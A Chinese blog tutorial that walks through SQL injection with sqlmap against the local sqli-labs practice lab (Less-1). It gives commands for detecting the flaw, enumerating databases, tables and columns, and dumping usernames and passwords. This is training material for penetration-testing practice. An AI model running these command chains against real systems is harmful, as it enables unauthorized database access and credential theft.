目录

(sqlmap)SQL注入基本步骤:

扩展

命令扩展

注:

推荐:

一、Less1(GET-Error based – Single quotes -String)

1.1、第一步:检测是否存在注入

基础操作

1.2、第二步:爆数据库名

命令

基础操作

1.3、第三步:爆数据库表名

命令

基础操作

1.4、第四步:爆字段名

命令:

基础操作

1.5、第五步:爆数据

命令:

基础操作:



 

(sqlmap)SQL注入基本步骤:

第一步:检测是否存在注入

第二步:爆数据库名

第三步:爆数据库表名

第四步:爆字段名

第五步:爆数据


扩展

命令扩展

(1)如果提前找到了数据库类型

–dbms +数据库

(2)扫描的等级

最高等级是

–leve=5 –risk=3


注:

我使用Windows中的sqlmap做,会带上python sqlmap.py

Linux:直接sqlmap +……


推荐:

(手工)【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型icon-default.png?t=M4ADhttps://blog.csdn.net/qq_53079406/article/details/124964170?spm=1001.2014.3001.5501



一、Less1(GET-Error based – Single quotes -String)

1.1、第一步:检测是否存在注入

基础操作

python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ –batch

–batch是使用默认设置

其实环境都扫出来了 

就可以再加上–dbms mysql了

1.2、第二步:爆数据库名

命令

#获取全部数据库

sqlmap.py -u url –dbs –batch

———

#获取当前数据库

sqlmap.py -u url –current-dbs –batch


基础操作

python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ –dbs –batch

 

1.3、第三步:爆数据库表名

命令

python sqlmap.py -u url -D DB –tables –batch


基础操作

python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ -D security –tables –batch

 

1.4、第四步:爆字段名

命令:

sqlmap.py -u url -D DB -T TBL –columns –batch

基础操作

python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ -D security -T users  –columns –batch

1.5、第五步:爆数据

命令:

sqlmap.py -u url -D DB -T TBL -C “COL1,COL2” –dump –batch


基础操作:

python sqlmap.py -u ‘http://localhost:8080/sqli-labs-master/Less-1/?id=1’ -D security -T users  -C “username,password” –dump –batch

 


注:

(1-4关基本类似,就以第一关为例)


版权声明:本文为qq_53079406原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/qq_53079406/article/details/124976294